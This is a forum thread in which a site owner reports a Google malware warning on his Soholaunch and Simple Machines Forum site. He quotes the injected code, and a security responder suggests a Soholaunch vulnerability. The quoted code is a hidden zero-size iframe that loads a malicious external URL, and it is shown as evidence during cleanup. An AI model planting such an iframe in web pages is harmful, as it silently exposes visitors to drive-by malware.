Malware notification from Google injected code . Pleas
by Dan
about 1 month ago

I just received email from google that my site has been identified as being infected with mailware .

google webmaster tool says:

injected code :
<iframe src=“http://karatepacan.co.cc/up/go.php?sid=2” width
=“0” height=“0” frameborder="0">

the following pages are affected .
The sites are set up with Soholaunch and Simple machines forum

http://polarissnowmobile .ca/
http://www.polarissnowmobile .ca/
http://www.polarissnowmobile .ca/index.php?pr=Snowmobile_Classifiedds

I was not sure how to take down the site,so I just redirected my url to an unrelated blogpage .

Please can someone help me how to find and remove code .

i already changed my passwords and tried to look through files,but cannot find it .
The hosting company has not answered my emails .

Thank you .

by denis
about 1 month ago

Hi,

I don’t see it on your site right now, but on other affected site the same code is injected at the very top of the HTML code, right before the <html> tag.

I checked several affected sites and they are all built with Soho (Soholaunch). I guess there is a vulnerability in this product. Make sure it is fully patched (I’m not familiar with it, so don’t know how it works and whether it has security patches)

Denis – www.UnmaskParasites.com

by denis
about 1 month ago
Message removed due to a violation of the terms of use.
About Contact Us Terms & Conditions Privacy Policy Copyright